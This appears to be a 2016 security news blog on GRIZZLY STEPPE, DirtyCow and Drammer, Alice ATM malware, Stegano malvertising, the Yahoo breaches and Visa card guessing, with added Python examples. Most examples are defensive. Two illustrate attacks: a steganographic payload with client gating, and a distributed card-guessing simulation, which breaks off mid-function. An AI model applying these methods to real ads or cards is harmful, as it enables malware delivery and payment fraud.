Saturday, 31 December 2016

U.S. Government Maps Election Hacks to Russian Threat Groups

The Department of Homeland Security (DHS) and the Federal Bureau of Investigation (FBI) on Thursday published a Joint Analysis Report (JAR) to detail the tools and infrastructure that Russian hackers used in attacks against the United States election.

The JAR was meant to offer technical details on the cyber activities of Russian civilian and military intelligence services (RIS), some of which targeted the US government and political and private entities. This is the first time the malicious cyber activity, which the US calls GRIZZLY STEPPE, has been officially attributed to specific threat groups.

As expected, U.S. President Barack Obama on Thursday announced several retaliatory actions against Moscow, imposing sanctions on two intelligence agencies, expelling 35 diplomats and denying access to two Russian compounds inside the United States.

In October this year, the US government officially accused Russia of involvement in the cyber-attacks against US political organizations, saying that some states had seen scanning and probing activity originating from servers operated by a Russian company, but it did not tie the activity to specific groups at the time. The report (PDF) not only makes that attribution, but also provides recommended mitigations and suggested actions to take in response to the indicators provided.

The JAR reveals that two different actors participated in the intrusion into a U.S. political party, one in the summer of 2015, namely Advanced Persistent Threat (APT) 29, and the other in spring 2016, namely APT28. The former is also known as Cozy Bear, or CozyDuke, while the latter is referred to as Fancy Bear, Pawn Storm, Strontium, Sofacy, Sednit and Tsar Team.

This falls in line with what intelligence firm CrowdStrike revealed in June, after assisting the Democratic National Committee (DNC), the formal governing body for the U.S. Democratic Party, in investigating cyber-attacks against its network. Later that summer, two security firms uncovered evidence that Fancy Bear had breached the U.S. Democratic Congressional Campaign Committee (DCCC) as well.

Both Cozy Bear and Fancy Bear were previously linked to attacks against US government organizations and other governments worldwide. Their attack methods include spearphishing emails carrying links to malicious droppers, and credential-harvesting pages hosted on domains closely resembling those of the targeted organizations, with the links often hidden behind URL shorteners.

“Once APT28 and APT29 have access to victims, both groups exfiltrate and analyze information to gain intelligence value. These groups use this information to craft highly targeted spearphishing campaigns. These actors set up operational infrastructure to obfuscate their source infrastructure, host domains and malware for targeting organizations, establish command and control nodes, and harvest credentials and other valuable information from their targets,” the JAR reads.

Previously, security researchers managed to identify some of the tools that these actors use, such as the XTunnel malware that is believed to have been specifically created for the DNC hack. Other malicious applications include the Fysbis backdoor to target Linux machines, the Komplex Trojan targeting OS X systems, and the Carberp malware to compromise Windows computers.

While many in the cybersecurity community understandably question whether the report contains enough detail to attribute the attacks to Russia, the US government claims that it has sufficient evidence to link RIS to the recent attacks. Moreover, it says that these aren't isolated incidents, but part of ongoing campaigns targeting the nation. The security industry, however, has widely criticized IOC-based attribution as weak evidence on which to confidently point a finger.

In October, Kaspersky Lab security researchers warned of the deep implications of misattribution, suggesting that attribution is difficult, mainly because of the widespread use of sophisticated deception tactics among hacking groups.

“This activity by RIS is part of an ongoing campaign of cyber-enabled operations directed at the U.S. government and its citizens. These cyber operations have included spearphishing campaigns targeting government organizations, critical infrastructure entities, think tanks, universities, political organizations, and corporations leading to the theft of information,” the report claims.

For US organizations to better protect themselves against such attacks, the JAR provides a list of alternate names associated with RIS, along with Indicators of Compromise (IOCs), distributed in accompanying CSV and STIX XML files, and recommendations on the actions that network administrators should take to detect compromise and secure their perimeters.

While some industry experts applauded the GRIZZLY STEPPE indicators provided by the U.S. Government, others urged caution before quickly integrating them into cyber defense measures.

“Be careful using the DHS/FBI GRIZZLY STEPPE indicators. Many are VPS, TOR relays, proxies, etc. which will generate lots of false positives,” Robert M. Lee, founder and CEO of Dragos Security and a former member of the intelligence community, tweeted.
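A practitioner integrating the GRIZZLY STEPPE indicators would want to apply exactly the caution Lee describes before the list goes into a SIEM. The following is an added example, not code from the JAR or from DHS/FBI: it loads a small indicator CSV, downgrades the confidence of any address that is also a known Tor exit or sits in a VPS range, and then matches a few proxy log lines so that low-confidence hits are routed to review rather than raised as alerts. The CSV, the Tor exit list, the VPS range and the log lines are all constructed for the example, using documentation IP ranges.

```python
"""Triage a GRIZZLY STEPPE-style IOC list before loading it into detection.

Added example, not code from the JAR or from DHS/FBI. The indicator CSV,
the Tor exit list and the proxy log lines are constructed for the example;
the IP addresses are documentation ranges, not indicators from the report.
"""
import csv
import io
import ipaddress
import re

# Constructed indicator file, loosely shaped like an IOC export.
INDICATOR_CSV = """indicator,type,description
192.0.2.10,ipv4,C2 node
198.51.100.7,ipv4,Staging server
203.0.113.200,ipv4,Possible Tor relay
malicious-example.test,fqdn,Spearphishing landing page
"""

# Constructed "shared infrastructure" lists. In practice these come from the
# Tor Project's exit list and a VPS provider range list you maintain.
TOR_EXITS = {"203.0.113.200"}
VPS_RANGES = [ipaddress.ip_network("198.51.100.0/24")]

# Constructed proxy log lines: timestamp, client, method, URL.
PROXY_LOG = """2016-12-30T10:01:02Z 10.0.0.5 GET http://192.0.2.10/update.php
2016-12-30T10:02:15Z 10.0.0.9 GET https://www.example.org/
2016-12-30T10:03:44Z 10.0.0.5 GET http://malicious-example.test/login
2016-12-30T10:05:00Z 10.0.0.12 GET http://203.0.113.200/
2016-12-30T10:06:31Z 10.0.0.7 GET http://198.51.100.7/img.gif
"""

LOG_RE = re.compile(r"^(\S+) (\S+) (\S+) (?:https?://)?([^/\s]+)")


def load_indicators(text):
    """Parse the CSV and tag each indicator with a confidence label."""
    out = {}
    for row in csv.DictReader(io.StringIO(text)):
        ind = row["indicator"].strip().lower()
        conf = "high"
        if row["type"] == "ipv4":
            addr = ipaddress.ip_address(ind)
            if ind in TOR_EXITS:
                conf = "low"       # shared exit: any Tor user will hit it
            elif any(addr in net for net in VPS_RANGES):
                conf = "medium"    # shared hosting, may be reassigned
        out[ind] = {"type": row["type"], "desc": row["description"], "confidence": conf}
    return out


def match_log(log_text, indicators):
    """Return (destination, client, confidence) for each log line hitting an IOC."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        _ts, client, _method, dest = m.groups()
        dest = dest.split(":")[0].lower()   # drop any :port
        if dest in indicators:
            hits.append((dest, client, indicators[dest]["confidence"]))
    return hits


def triage(log_text=PROXY_LOG, ioc_text=INDICATOR_CSV):
    """Split hits into alert-worthy (high/medium) and review-only (low)."""
    hits = match_log(log_text, load_indicators(ioc_text))
    alerts = [h for h in hits if h[2] != "low"]
    review = [h for h in hits if h[2] == "low"]
    return alerts, review


if __name__ == "__main__":
    alerts, review = triage()
    for dest, client, conf in alerts:
        print(f"ALERT  {client} -> {dest} ({conf})")
    for dest, client, conf in review:
        print(f"REVIEW {client} -> {dest} ({conf}, shared infrastructure)")
```

The confidence label is attached to the indicator, not the log line, so the same list can be reused across data sources; a real deployment would refresh the Tor exit list daily, since relays change.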

Sunday, 25 December 2016

DirtyCow and Drammer vulnerabilities "hijack Android devices"

The vulnerabilities are known colloquially as DirtyCow (CVE-2016-5195) and Drammer (CVE-2016-6728). While they are unrelated, both represent a real risk to Android users: proof-of-concept exploit code has already been published online for each, which cuts the time an attacker would need to understand the bug and develop an exploit from scratch. Additionally, industry researchers have already seen attackers using DirtyCow to exploit Linux-based systems in the wild.

Given that the CVEs and the POC code are publicly available, enterprises should see this as a concern. If an attacker roots a device, she has full control over it, which means she may also be able to collect sensitive data from the device. If the victim is an employee, that may mean company information is being leaked. Having visibility into the kinds of apps, rooted devices, or outdated software running on the corporate network is critical.


The DirtyCow bug has been in the Linux kernel for about nine years and affects all versions of Android, including the latest, Android 7.0 Nougat. While Linus Torvalds created and released a patch for the Linux kernel, which Android uses, the patch has not yet been released to Android users as a security update.

DirtyCow is an easy vulnerability to understand, and proof-of-concept exploit code is already in the wild, available to researchers and attackers alike. We expect to see this issue patched in the November 2016 Android Security Update at the earliest.
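The enterprise visibility point above comes down to a concrete check: which devices report a security patch level that predates the fix. The script below is an added example, not Lookout's tooling. It parses constructed `getprop ro.build.version.security_patch` and `uname -r` output for a small fleet; the required patch level is an assumption that you would set to the bulletin that ships the fix you care about, and the upstream stable kernel versions listed are the 4.x releases that carried the CVE-2016-5195 fix, used only as a hint because most Android vendor kernels are older 3.x trees with backports.

```python
"""Flag Android devices whose security patch level predates a required level.

Added example, not Lookout's code. The getprop/uname output is constructed to
look like `adb shell getprop ro.build.version.security_patch` and
`adb shell uname -r` results. REQUIRED_PATCH_LEVEL is an assumption for the
example: set it to the bulletin level that shipped the fix you care about.
FIXED_KERNELS holds the upstream stable releases that carried the DirtyCow
(CVE-2016-5195) fix; vendor kernels are usually 3.x trees with backports, so
the kernel version is only a hint and the patch level is authoritative.
"""
from datetime import date
import re

REQUIRED_PATCH_LEVEL = date(2016, 12, 5)   # assumption, see module docstring
FIXED_KERNELS = {(4, 8): (4, 8, 3), (4, 7): (4, 7, 9), (4, 4): (4, 4, 26)}

# Constructed fleet snapshot: serial -> (security_patch prop, uname -r).
FLEET = {
    "SERIAL001": ("2016-12-05", "3.18.31-g1234567"),
    "SERIAL002": ("2016-10-01", "3.10.49-g89abcde"),
    "SERIAL003": ("", "4.4.21-gdeadbee"),            # prop missing on old builds
    "SERIAL004": ("2017-01-01", "4.4.26-g0badf00"),
}


def parse_patch_level(prop):
    """ro.build.version.security_patch is YYYY-MM-DD; empty on pre-Marshmallow builds."""
    m = re.fullmatch(r"(\d{4})-(\d{2})-(\d{2})", prop.strip())
    if not m:
        return None
    return date(*map(int, m.groups()))


def parse_kernel(uname):
    """Take the numeric x.y.z prefix of uname -r, ignoring vendor suffixes."""
    m = re.match(r"(\d+)\.(\d+)\.(\d+)", uname)
    return tuple(map(int, m.groups())) if m else None


def kernel_hint(version):
    """'fixed', 'vulnerable' or 'unknown', based only on upstream stable numbers."""
    if version is None:
        return "unknown"
    fixed = FIXED_KERNELS.get(version[:2])
    if fixed is None:
        return "unknown"        # e.g. a 3.x vendor tree: cannot tell from the version
    return "fixed" if version >= fixed else "vulnerable"


def assess(serial, patch_prop, uname, required=REQUIRED_PATCH_LEVEL):
    level = parse_patch_level(patch_prop)
    hint = kernel_hint(parse_kernel(uname))
    if level is not None and level >= required:
        status = "patched"
    elif hint == "fixed":
        status = "likely-patched"    # new enough upstream kernel, prop stale or missing
    elif level is not None or hint == "vulnerable":
        status = "needs-update"
    else:
        status = "unknown"           # no prop and no usable kernel hint: inspect by hand
    return {"serial": serial, "patch_level": level, "kernel_hint": hint, "status": status}


def fleet_report(fleet=FLEET):
    return [assess(s, p, u) for s, (p, u) in sorted(fleet.items())]


if __name__ == "__main__":
    for r in fleet_report():
        print(f"{r['serial']}: {r['status']} (patch {r['patch_level']}, kernel {r['kernel_hint']})")
```

Devices that report no patch level at all and run a kernel the table cannot classify land in "unknown", which is the honest answer; treating them as patched is how rooted or stale devices slip through an inventory.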


The second vulnerability, called Drammer and discovered by VUSec, is the first application of the Rowhammer technique to ARM-based devices, in this case Android phones. Rowhammer is a hardware flaw in DRAM: repeatedly accessing (“hammering”) one row of memory cells can induce bits in adjacent rows, which the attacker does not control, to flip and change value. If an attacker can arrange for a sensitive structure such as a page-table entry to sit in a vulnerable row, a flipped bit can redirect that entry to memory the attacker does control, so the device can eventually be compromised and rooted. Drammer likely works on all versions of Android including the latest, but mileage may vary between devices.


Google has banned the Drammer PoC app from the Google Play Store. Lookout customers are protected from this test app. Our investigation revealed that the banned PoC app published by the academic researchers is not overtly malicious, but it does exploit the vulnerability and has been observed to cause a local denial of service when an exploit attempt fails.

Enterprises should use a mobile security partner to gain awareness into the apps running on their employees’ devices and to receive timely alerts when one of those apps is risky or malicious.

Indian-origin teenager arrested in US for cyber-attack on 911 system

An Indian-origin teenager has been arrested in the US for carrying out a cyber-attack that swamped Arizona's emergency services with a flood of bogus calls, an incident he claimed was a non-harmful joke gone wrong. Meetkumar Hiteshbhai Desai was taken into custody after the Surprise Police Department, Arizona, notified the Sheriff's Office of more than 100 hang-up 911 calls.

The Maricopa County Sheriff's Office arrested the 18-year-old, accusing him of carrying out a cyber-attack on the 911 system, according to a Sheriff's Office statement. Desai was booked into a Maricopa County jail on suspicion of three counts of computer tampering.

Interference with critical infrastructure could have disrupted the 911 system in the Phoenix area and potentially other states, The Arizona Republic reported. Investigators traced the calls and discovered they originated from a link posted to Twitter, according to the statement.

The link was to a site named "Meet Desai" and its domain was hosted out of San Francisco. When the link was clicked, it continually called 911 and would not let the caller hang up. Peoria police and the MCSO also received a large number of calls, and the volume had the potential to shut down 911 service across Maricopa County, the Sheriff's Office said. MCSO detectives identified 'Meet' and took him in for questioning last Wednesday.
"Meet claims that his intention was to make a non-harmful, but annoying bug that he believed was 'funny'," the Sheriff's Office statement said.

Desai told investigators that he was approached by an online friend with a bug. Desai then tweaked the bug so it would add pop-ups, prompts to open e-mail applications and activation of automatic telephone dialling on iOS devices, all via coding that Desai wrote himself.

Desai told sheriff's detectives that he was interested in programmes, bugs and viruses that he could manipulate and change. Desai said Apple Inc., the hardware and software company, would pay and credit him for discovering such bugs and viruses. The MCSO cyber crimes unit executed a search warrant and seized multiple items at Desai's residence that will be forensically examined, the Sheriff's Office said.

Wednesday, 21 December 2016

"Alice" Malware Drains All Cash from ATMs

Dubbed Alice, the malware is the most stripped down ATM threat seen to date. The malware has no information stealing capabilities and can’t even be controlled via the ATM’s numeric keypad. Initially discovered in November 2016, Alice is believed to have been around since 2014, and Trend Micro says that it is only the eighth ATM malware family seen to date, although such threats have been around for over nine years.

Use of the malware requires physical access to an ATM, and Trend Micro suggests that it has been designed for money mules to empty all the cash from an attacked machine, something that malware such as GreenDispenser was seen doing last year.

Unlike that malware, however, the new threat doesn't connect to the ATM's PIN pad, and it could also be operated via Remote Desktop Protocol (RDP), although Trend Micro says there is no evidence of such use so far.

Malware analysis revealed that Alice (the name was included in the version information of the binary) was packed with a commercial, off-the-shelf packer/obfuscator called VMProtect, which prevents execution inside debuggers. Further, the malware checks its environment before execution and terminates itself if it determines it isn’t running on an ATM (it checks for a couple of registry keys and also requires specific DLLs to be installed on the system).

When running on a machine, Alice writes two files in the root directory, namely an empty 5 MB+ sized file called xfs_supp.sys and an error logfile called TRCERR.LOG. Next, it connects to the CurrencyDispenser1 peripheral, which is the dispenser device in the XFS environment and, if a correct PIN is provided, it displays information on the various cassettes with money loaded inside the machine.

Because the malware only connects to the CurrencyDispenser1 peripheral and doesn’t attempt to use the machine’s PIN pad, the researchers believe that the attackers physically open the ATM and infect it via USB or CD-ROM. Moreover, they suggest that the actors connect a keyboard to the machine’s mainboard and operate the malware through it.

The security researchers discovered that Alice supports three commands, each issued via specific PINs: one to drop a file for uninstallation, another to exit the program and run the uninstallation/cleanup routine, and a third to open the “operator panel.” This panel is where information on the cash available inside the ATM is displayed.

The attacker simply needs to enter the cassette’s ID for the ATM to dispense the money in it. The dispense command is sent to the CurrencyDispenser1 peripheral via the WFSExecute API. With ATMs typically having a 40-banknote dispensing limit, the attacker might have to perform the same operation multiple times to empty all the cash stored in a cassette. Information on the available cash is dynamically updated on the screen, so the attacker knows when a cassette is empty.

Trend Micro believes that the attackers manually replace the Windows Task Manager on targeted machines with Alice, because the malware is usually found on infected systems under the name taskmgr.exe. The malware has no persistence mechanism of its own, but standing in for Task Manager means Alice is launched whenever Task Manager is invoked.
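The artifacts Trend Micro lists (a taskmgr.exe that is not Microsoft's, an empty 5 MB+ xfs_supp.sys in the drive root, a TRCERR.LOG beside it, and the XFS middleware the malware requires) are enough to write a hunt. The script below is an added example rather than Trend Micro's detection logic, and it runs over a constructed file inventory in place of a mounted forensic image; the product-name and signer fields stand in for VERSIONINFO and Authenticode data you would read with a PE parser. The XFS Manager DLL name msxfs.dll is the standard CEN/XFS name and is an assumption about what the malware's DLL check looks for.

```python
"""Hunt for Alice-style artifacts on an XFS-equipped Windows ATM image.

Added example; not Trend Micro's code and not a signature for the real
samples. It encodes only the artifacts described in the write-up: a
taskmgr.exe whose version information is not Microsoft's (Alice carries its
own name there), an empty xfs_supp.sys of 5 MB or more in the drive root, and
a TRCERR.LOG next to it. The inventory is constructed; in practice you would
build it from a mounted image. msxfs.dll as the XFS Manager is an assumption.
"""
import ntpath

FIVE_MB = 5 * 1024 * 1024

# Constructed inventory: path -> (size_bytes, all_zero_bytes, product_name, signer).
INVENTORY = {
    r"C:\Windows\System32\taskmgr.exe": (1_200_000, False, "Microsoft Windows Operating System", "Microsoft Corporation"),
    r"C:\Windows\taskmgr.exe": (350_000, False, "Alice", None),
    r"C:\xfs_supp.sys": (FIVE_MB + 4096, True, None, None),
    r"C:\TRCERR.LOG": (2_048, False, None, None),
    r"C:\Windows\System32\msxfs.dll": (900_000, False, "XFS Manager", "Vendor"),
}


def is_drive_root(path):
    head, _tail = ntpath.split(path)
    return ntpath.splitdrive(head)[1] in ("\\", "")


def check_taskmgr(path, meta):
    """Task Manager binaries not signed by Microsoft, or naming Alice, are suspect."""
    _size, _zeros, product, signer = meta
    if ntpath.basename(path).lower() != "taskmgr.exe":
        return None
    reasons = []
    if signer != "Microsoft Corporation":
        reasons.append("not Microsoft-signed")
    if product and "alice" in product.lower():
        reasons.append("version info names Alice")
    if not reasons:
        return None
    return ("taskmgr-replaced", path, "; ".join(reasons))


def check_dropped_files(inventory):
    """Pair the empty 5 MB+ xfs_supp.sys with a TRCERR.LOG in the same drive root."""
    findings = []
    for path, (size, zeros, _p, _s) in inventory.items():
        name = ntpath.basename(path).lower()
        if name == "xfs_supp.sys" and is_drive_root(path) and zeros and size >= FIVE_MB:
            log = ntpath.splitdrive(path)[0] + "\\TRCERR.LOG"
            has_log = any(p.lower() == log.lower() for p in inventory)
            detail = "empty 5MB+ xfs_supp.sys" + (" with TRCERR.LOG" if has_log else "")
            findings.append(("alice-artifacts", path, detail))
    return findings


def hunt(inventory=INVENTORY):
    findings = []
    for path, meta in inventory.items():
        f = check_taskmgr(path, meta)
        if f:
            findings.append(f)
    findings.extend(check_dropped_files(inventory))
    # Alice exits unless the XFS middleware is present, so its absence lowers
    # confidence in any other hit on the same machine.
    has_xfs = any(ntpath.basename(p).lower() == "msxfs.dll" for p in inventory)
    return {"findings": findings, "xfs_present": has_xfs}


if __name__ == "__main__":
    result = hunt()
    print("XFS middleware present:", result["xfs_present"])
    for kind, path, detail in result["findings"]:
        print(f"{kind}: {path} ({detail})")
```

Checking the signer rather than the file hash is deliberate: a hash list only catches samples you already have, while an unsigned or oddly named Task Manager on an ATM is anomalous whatever the sample.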

“The existence of a PIN code prior to money dispensing suggests that Alice is used only for in-person attacks. Neither does Alice have an elaborate install or uninstall mechanism - it works by merely running the executable in the appropriate environment,” the researchers say.

The PIN authentication system is similar to that used by other ATM malware families, but it also provides the malware author with control over who has access to Alice. By changing the access code between samples, the author either prevents money mules from sharing the code or keeps track of individual money mules, or both.

The analyzed sample used a 4-digit passcode, but other samples could use longer PINs. The PIN cannot practically be brute-forced, as the malware accepts only a limited number of inputs before displaying an error message and terminating. The researchers also believe that Alice was designed to run on any vendor's hardware configured to use the Microsoft Extended Financial Services (XFS) middleware.

“Up until recently, ATM malware was a niche category in the malware universe, used by a handful of criminal gangs in a highly targeted manner. We are now at a point where ATM malware is becoming mainstream,” Trend Micro researchers say.

Tuesday, 20 December 2016

Cyberattack may have caused the power outage that occurred in Ukraine

Ukrenergo said the outage occurred on Saturday, near midnight, at the North (Petrivtsi) substation, causing blackouts in the capital city of Kiev and the Kiev region.

Ukrenergo Acting Director Vsevolod Kovalchuk said workers switched to manual mode and started restoring power after 30 minutes. Power was fully restored after just over an hour, Kovalchuk said.

The statement published by Ukrenergo names equipment malfunction and hacking as the possible causes. However, in a message posted on Facebook, Kovalchuk said the main suspect was “external interference through the data network.” The organization’s cybersecurity experts are investigating the incident.

Roughly one year ago, the Ukrainian security service SBU accused Russia of causing outages with the aid of malware planted on the networks of several regional energy companies.

Researchers determined that these attacks involved two main pieces of malware: the BlackEnergy Trojan and KillDisk, a plugin designed to destroy files and render systems inoperable. The attackers directly interacted with the systems in order to cut off the power supply, and used KillDisk to make recovery more difficult, experts said.

In the 2015 attacks, power companies restored service within 3-6 hours by switching to manual mode, just like in the latest incident.

A report published recently by Booz Allen Hamilton revealed that the 2015 cyberattacks were likely part of a two-year campaign that targeted several sectors in Ukraine. Researchers identified 11 attacks aimed at the electricity, railway, media, mining and government sectors.

While experts have not found any hard evidence linking these attacks to Russia, the attackers’ significant resources appear to indicate the involvement of a nation state, and the threat actor’s goals align with Russian political interests.

Friday, 16 December 2016

Yahoo's billion-user database was sold on the Dark Web last August for $300,000.

The New York Times reports that a database of a billion Yahoo users was sold on the Dark Web last August for $300,000.

That’s according to Andrew Komarov, chief intelligence officer at security firm InfoArmor. He told the NYT that three buyers, including two prominent spammers and another who might be involved in espionage, purchased the entire database at that price from a hacker group believed to be based in Eastern Europe.

It’s lovely to know that it only costs $300,000 to be able to threaten a billion people’s online existence, which works out to $0.0003 per account for hackers who can ruin your life online in a matter of minutes.

Yahoo also doesn’t yet know who made off with all the data in the 2013 attack, which is said to be the largest breach of any company ever.

In addition to full names, hashed passwords, birth dates and phone numbers, the database also contains security questions and backup email addresses that could help with resetting forgotten passwords.

That’s worrying, because these details may be common to several other online services and accounts, and could make many users vulnerable to phishing attacks that feature accurate personal information in scam emails to coax them into handing over things like bank account, credit card and social security numbers.

Yahoo has said that it hasn’t been able to verify Komarov’s claims yet; meanwhile, the FBI said in a statement that it is investigating the breach.

Komarov noted that the database is still up for sale, though bids for it have now plummeted to as low as $20,000 since Yahoo forced a password reset.

It’ll be interesting to see what this revelation means for the future of Yahoo, which is set to be sold to Verizon for $4.8 billion. Following the news of the 500 million-user breach earlier this year, the telecom giant said it wanted a billion-dollar discount on the deal. At this point, though, it seems like it might be better off walking away empty-handed.

Monday, 12 December 2016

Yahoo patches critical XSS vulnerability that allowed hackers to read any email

Yahoo, which was in the limelight for revealing a massive hack on its users earlier this year, has fixed a highly critical cross-site scripting (XSS) security flaw in its email system that would have allowed attackers to access any email.

The flaw was discovered and reported by Finland-based security researcher Jouko Pynnonen, who earned $10,000 for the find from Yahoo’s bug bounty program. The flaw allowed an attacker to read a victim’s email or create a virus infecting Yahoo Mail accounts, among other things. Unlike email phishing scams and ransomware attacks, there was no need for the hacker to send a virus or trick the victim into clicking a specific link: an attacker only had to send the victim an email that, once viewed, gave access to their mailbox.

The bug resided in Yahoo Mail’s HTML filtering. Because an email can carry attachments and other rich content, Yahoo inspects the “raw” HTML of incoming messages and filters it to keep malicious code at bay. Pynnonen’s investigation showed that this filtering could be bypassed by embedding a YouTube link in the email in a way that let the attacker execute JavaScript in the victim’s session and read the user’s emails.

The report of the critical flaw comes just months after the tech giant admitted that a massive data breach in 2014 gave access to information on more than 500 million user accounts. The attack, described as the largest in the history of the Internet, gave hackers access to names, email addresses, telephone numbers, encrypted or unencrypted security questions and answers, dates of birth, and encrypted passwords. The company later blamed the attack on state-sponsored parties but did not name any country.

Friday, 9 December 2016

ESET: Internet users possibly exposed to malicious malvertising campaign

The firm says that the cyber-criminals behind the campaign have, since at least the beginning of October, been distributing malicious ads promoting applications calling themselves “Browser Defence” and “Broxu” which redirect users to the Stegano exploit kit.
ESET added:
“Without requiring any user interaction, the initial script reports information about the victim’s machine to the attacker’s remote server. Based on server-side logic, the target is then served either a clean image or its almost imperceptibly modified malicious evil twin.
“Using the known Internet Explorer vulnerability CVE-2016-0162, the encoded script attempts to verify that it is not being run in a monitored environment such as a malware analyst’s machine.” If the script does not detect any signs of monitoring, it redirects to the Stegano exploit kit’s landing page.
Upon successful exploitation, the executed shellcode collects information on installed security products and performs, as paranoid as the cyber-criminals behind this attack are, yet another check to verify that it is not being monitored. If the results are favorable, it attempts to download the encrypted payload from the same server again, disguised as a GIF image.
Apparently, payloads detected so far include backdoors, banking trojans, spyware, file stealers and various trojan downloaders.
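To make the “almost imperceptibly modified evil twin” concrete, here is an added example (not ESET's analysis code and not the kit's exact encoding) of the general technique: a script is written into the least significant bit of the alpha channel of an RGBA pixel buffer, so every changed byte differs from the clean ad by exactly one. It also shows the server-side gating described above, and the diff a defender can run when the same ad slot serves different images to a fingerprinted browser and to an analysis box. The 16x16 gradient stands in for a real ad and the buffers are raw bytes, so no image library is needed.

```python
"""Illustrate an 'evil twin' ad image carrying a script in near-invisible
pixel changes, and the diff a defender can run against the clean copy.

Added example; a generic least-significant-bit scheme over the alpha channel
of an RGBA pixel buffer, not a reimplementation of the Stegano kit's encoding.
The 'clean' image is a constructed 16x16 gradient rather than a real ad.
"""

W, H = 16, 16  # constructed ad: 256 pixels, so 256 alpha bits, 32 bytes of capacity


def make_clean_image(w=W, h=H):
    """Opaque RGBA gradient; alpha is 255 everywhere, as in a typical banner."""
    px = bytearray()
    for y in range(h):
        for x in range(w):
            px += bytes(((x * 16) & 0xFF, (y * 16) & 0xFF, 128, 255))
    return bytes(px)


def embed(image, payload):
    """Write payload bits into the low bit of every alpha byte (4th byte of a pixel)."""
    capacity = len(image) // 4 // 8
    if len(payload) > capacity:
        raise ValueError(f"payload of {len(payload)} bytes exceeds {capacity}-byte capacity")
    bits = [(b >> i) & 1 for b in payload for i in range(7, -1, -1)]
    out = bytearray(image)
    for n, bit in enumerate(bits):
        idx = n * 4 + 3
        out[idx] = (out[idx] & 0xFE) | bit
    return bytes(out)


def extract(image, length):
    """Read `length` bytes back out of the alpha low bits (what the loader script does)."""
    bits = [image[n * 4 + 3] & 1 for n in range(length * 8)]
    return bytes(sum(bit << (7 - i) for i, bit in enumerate(bits[k:k + 8]))
                 for k in range(0, len(bits), 8))


def choose_variant(clean, twin, client):
    """Server-side gating: a client that looks monitored, or is not the
    targeted browser, gets the clean image and never sees the payload."""
    if client.get("monitored") or client.get("browser") != "IE":
        return clean
    return twin


def twin_report(clean, served):
    """What a defender sees when the image served to one client is diffed
    against the image served to another: tiny deltas confined to alpha."""
    deltas = [(i, abs(x - y)) for i, (x, y) in enumerate(zip(clean, served)) if x != y]
    return {
        "changed_bytes": len(deltas),
        "max_delta": max((d for _, d in deltas), default=0),
        "only_alpha_changed": all(i % 4 == 3 for i, _ in deltas),
    }


if __name__ == "__main__":
    clean = make_clean_image()
    twin = embed(clean, b"document.write()")      # constructed stand-in for the loader script
    served = choose_variant(clean, twin, {"browser": "IE", "monitored": False})
    print("recovered:", extract(served, 16))
    print("diff vs clean:", twin_report(clean, served))
```

The diff report is the defensive takeaway: an opaque banner whose alpha channel differs by one between two fetches has no legitimate reason to, and that check needs no knowledge of the encoding.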
“This type of malicious activity shows clearly how cyber-criminals are adapting to the best means to distribute and infect as many as possible through the platforms that work," Mark James, IT security specialist at ESET, told Infosecurity. "There is a misconception that you have to visit ‘dodgy’ websites to get infected, but cyber-criminals are not stupid, why infect somewhere with a relatively small footfall when you can infect a website with infinitely more visitors thinking they are safe because they trust the name of the vendor?
“Some users still believe you actually have to click on a link or run a file to actually start the infection process, and what’s worse is in most cases the actual owner of the website is totally unaware they have a problem.”
The key to defending yourself, added James, is making sure you have a good regular updating internet security product installed along with keeping your operating system and applications patched and up-to-date.
"A lot of websites use ads to help fund the free content we want and using things like ad blockers can have an adverse effect on this revenue stream but is a means of defense that could stop this type of attack.”

Wednesday, 7 December 2016

Visa card details can be guessed in seconds: researchers explain the main problem

Researchers have warned that deficiencies in Visa’s e-commerce payment network could allow attackers to brute-force credit card details in as little as six seconds.

A paper from Newcastle University’s Mohammed Aamir Ali, Budi Arief, Martin Emms and Aad van Moorsel describes how they were able to launch a “distributed guessing attack” against the payment sites of Alexa top-400 online merchants to work out expiry dates and CV2 values.

As different sites perform different security checks to validate card details, hackers can launch mass attempts across a range of sites to work out the key verification details.

MasterCard is not affected as it enforces centralized checks across transactions from different sites and so detects the guessing attack after fewer than 10 attempts; Visa’s payment ecosystem does not, and so is wide open to the attack, the report claimed.

The researchers explained the main problem:

“The first weakness is that in many settings, the current online payment system does not detect multiple invalid payment requests on the same card from different websites. Effectively, this implies that practically unlimited guesses can be made by distributing the guesses over many websites, even if individual websites limit the number of attempts.

"Secondly, the attack scales well because different web merchants provide different fields, and therefore allow the guessing attack to obtain the desired card information one field at a time.”

Guessing an expiry date using the methodology detailed in the report takes at most 60 attempts (12 months across five years), and the three-digit CV2 fewer than 1,000.

The researchers also showed that in some cases even addresses could be guessed by the same method.

However, the attacker must already know the long card number.

It should also be noted that websites running the 3D Secure system are not susceptible to the attack, as its pop-up window requires the user to enter a separate secret password as well as the CV2 to complete an order.
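The two weaknesses quoted above can be simulated end to end. The script below is an added example, not the Newcastle team's tooling: stand-in merchants each validate their own subset of fields and rate-limit a card after ten attempts, and a stand-in issuer either counts failures only per merchant (the Visa behaviour the paper describes) or network-wide with a limit of ten (the MasterCard behaviour). Guesses for one field at a time are rotated across the 400 merchants; the test card, the merchant mix and the limits are all constructed.

```python
"""Simulate the distributed guessing attack against per-field validation and
show why a centralized, per-card failure counter stops it.

Added example, not the Newcastle team's tooling. Issuer and Merchant are
constructed stand-ins: nothing here talks to a payment network. The card
values passed in are made up for the simulation.
"""
import random


class Issuer:
    """Holds the true card data; optionally enforces a network-wide failure limit."""

    def __init__(self, expiry, cvv, centralized_limit=None):
        self.expiry, self.cvv = expiry, cvv
        self.centralized_limit = centralized_limit
        self.failed = 0          # counted across every merchant
        self.blocked = False

    def authorise(self, fields):
        if self.blocked:
            return False
        ok = all(getattr(self, k) == v for k, v in fields.items())
        if not ok:
            self.failed += 1
            if self.centralized_limit is not None and self.failed >= self.centralized_limit:
                self.blocked = True
        return ok


class Merchant:
    """Each site validates its own subset of fields and rate-limits per card."""

    def __init__(self, name, checks, per_card_limit, issuer):
        self.name, self.checks, self.limit, self.issuer = name, checks, per_card_limit, issuer
        self.attempts = 0

    def try_payment(self, fields):
        if self.attempts >= self.limit:
            return None          # this merchant has cut us off
        self.attempts += 1
        return self.issuer.authorise({k: fields[k] for k in self.checks})


EXPIRY_SPACE = [(m, y) for y in range(2016, 2021) for m in range(1, 13)]   # 60 values
CVV_SPACE = [f"{n:03d}" for n in range(1000)]


def guess_field(merchants, issuer, field, space, known):
    """Spread guesses for one field over the merchants that validate exactly the
    known fields plus this one; returns (value or None, attempts made)."""
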